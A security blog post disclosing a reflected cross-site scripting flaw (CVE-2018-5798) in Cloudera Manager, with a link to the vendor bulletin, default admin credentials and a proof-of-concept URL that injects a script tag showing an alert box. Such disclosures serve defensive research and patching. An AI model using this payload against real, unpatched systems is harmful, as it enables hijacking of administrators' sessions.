Mar 23 2025

CVE-2018-5798 – Cross-site scripting vulnerability in Cloudera Manager – Part 2

Author: Shafeeque Olassery Kunnikkal | Category: Cross Site Scripting, CVE-2018-5798, Cyber Security | Leave a Comment

Below is the details of the reflected XSS , I have found in Cloudera Enterprise. More details can be found here :-  https://www.cloudera.com/documentation/other/securitybulletins/topics/Security-Bulletin.html#DOCS-3186

Login to Cloudera manager using credentials
admin:admin

1. Navigate the following URL which includes the XSS Payload.

Will see the XSS payload executed as shown in the image below.

xss

2. Navigate the following URL in browser after login to Cloudera Manager, use these credentials for login:- admin:admin

http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E

Will see the XSS payload executed as shown in the image below.

XSS

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Categories

Tags

Computer Forensics Degree Grove - Temp&Humi Sensor GPS-17285 HTU21D Email Fraud complete-knowledge testing Information Security Social Engineering Proximity Sensor Grove - Sound Sensor Secure Boot STM32F411 "BlackPill" Development Board JTAGenum Grove - Button SHA-256 Career Education STM32F411CEU6 LearningJourney Grove - Rotary Angle Sensor(P) STM32 Hardware Hacking BlackPill OpenOCD Reverse Engineering BH1750 Light Sensor STM32CubeIDE XSS BMP180 Firmware Arduino IoT Research Firmware Integrity ECDSA Reflected XSS Firmware Dumping TIGARD Phishing Embedded Security Grey Box Penetration Testing Grove - Ultrasonic Ranger Anavi Sensors Cyber Security E-Books partial-knowledge testing

Archives